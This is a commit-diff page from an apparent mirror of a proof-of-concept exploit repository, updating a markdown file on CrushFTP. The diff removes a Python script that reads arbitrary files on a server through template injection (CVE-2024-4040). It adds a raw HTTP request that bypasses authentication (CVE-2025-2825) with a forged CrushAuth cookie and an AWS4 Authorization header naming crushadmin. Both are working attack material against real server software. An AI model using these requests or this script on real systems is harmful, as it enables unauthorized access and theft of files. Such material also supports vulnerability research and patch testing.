admin/POC
1
0
Fork 0
mirror of https://github.com/eeeeeeeeee-code/POC.git synced 2025-05-05 10:17:57 +00:00
Code Issues Packages Projects Releases Wiki Activity

Update CrushFTP身份验证绕过(CVE-2025-2825).md

Browse Source
This commit is contained in:
Rainyseason 2025-03-31 14:55:29 +08:00 committed by GitHub
parent e7d58c6b09
commit 59289c32d6
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194
1 changed files with 8 additions and 55 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

63
wpoc/CrushFTP/CrushFTP身份验证绕过(CVE-2025-2825).md
View File

@ -1,60 +1,13 @@
## CrushFTP服务器端模板注入(CVE-2024-4040) ## CrushFTP身份验证绕过(CVE-2025-2825)
## poc ## poc
```python ```javascript
import requests GET /WebInterface/function/?command=getUserList&c2f=1111 HTTP/1.1
import argparse Host: target-server:8081
Cookie: CrushAuth=1743113839553_vD96EZ70ONL6xAd1DAJhXMZYMn1111
Authorization: AWS4-HMAC-SHA256 Credential=crushadmin/
HEADER = '\033[95m'
OKBLUE = '\033[94m'
OKCYAN = '\033[96m'
OKGREEN = '\033[92m'
WARNING = '\033[93m'
FAIL = '\033[91m'
ENDC = '\033[0m'
BOLD = '\033[1m'
UNDERLINE = '\033[4m'
def get_cookies(url):
try:
session = requests.Session()
response = session.get(url)
if response.status_code != 200:
raise Exception("Failed to connect to the server")
session.cookies.get_dict()
return session.cookies.get_dict()
except Exception as e:
print(FAIL + "Error: " + str(e) + ENDC)
quit()
def exploit(url, cookies, path):
try:
if not path.startswith("/") or not path.endswith("/"):
raise Exception("Invalid path format. Path should start and end with '/'")
url = url + "/WebInterface/function/?command=zip&c2f=" + cookies['currentAuth'] + "&path=<INCLUDE>" + path + "</INCLUDE>&names=*"
response = requests.get(url, cookies=cookies)
if response.status_code != 200:
raise Exception("Failed to connect to the server")
return response.text
except Exception as e:
print(FAIL + "Error: " + str(e) + ENDC)
quit()
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument("-u", "--url", help="URL of the target", required=True)
parser.add_argument("-p", "--path", help="Path to the file to read", required=True)
args = parser.parse_args()
url = args.url
path = args.path
if not url.startswith("http"):
print(WARNING + "URL should start with 'http' or 'https'")
quit()
cookies = get_cookies(url)
if 'currentAuth' not in cookies:
print(WARNING + "Not vulnerable" + ENDC)
quit()
else:
print(OKCYAN + exploit(url, cookies, path) + ENDC)
``` ```
![image](https://github.com/user-attachments/assets/6d6a18ba-3b8b-4c65-97c0-ad24cb59e1b2)